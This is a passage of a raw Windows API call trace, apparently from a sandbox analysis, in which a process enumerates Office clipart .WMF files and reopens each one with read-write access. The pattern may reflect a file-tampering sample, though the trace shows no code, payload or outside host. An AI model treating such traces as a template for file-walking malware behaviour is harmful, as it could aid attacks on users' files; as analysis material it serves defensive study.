[0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.572] AreFileApisANSI () returned 1 [0101.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0101.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 69 [0101.572] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1df4)) returned 1 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0101.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.572] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x212c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04225_.WMF", cAlternateFileName="")) returned 1 [0101.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0101.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0101.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0101.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0101.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0101.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0101.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0101.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0101.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.573] AreFileApisANSI () returned 1 [0101.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0101.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0101.573] AreFileApisANSI () returned 1 [0101.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0101.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 69 [0101.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.574] GetFileType (hFile=0x33c) returned 0x1 [0101.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0101.574] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.574] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.574] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.574] CloseHandle (hObject=0x33c) returned 1 [0101.574] AreFileApisANSI () returned 1 [0101.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0101.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 69 [0101.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.575] GetFileType (hFile=0x33c) returned 0x1 [0101.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0101.575] CloseHandle (hObject=0x33c) returned 1 [0101.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0101.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0101.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0101.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0101.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0101.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0101.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.576] AreFileApisANSI () returned 1 [0101.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0101.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 69 [0101.576] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x212c)) returned 1 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0101.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0101.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.577] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e7c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04235_.WMF", cAlternateFileName="")) returned 1 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0101.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0101.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.577] AreFileApisANSI () returned 1 [0101.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0101.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.578] AreFileApisANSI () returned 1 [0101.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0101.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 69 [0101.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.579] GetFileType (hFile=0x33c) returned 0x1 [0101.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0101.579] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.579] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.579] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.579] CloseHandle (hObject=0x33c) returned 1 [0101.580] AreFileApisANSI () returned 1 [0101.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0101.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 69 [0101.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.580] GetFileType (hFile=0x33c) returned 0x1 [0101.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.580] CloseHandle (hObject=0x33c) returned 1 [0101.580] RtlAllocateHeap (HeapHandle=0x20000, 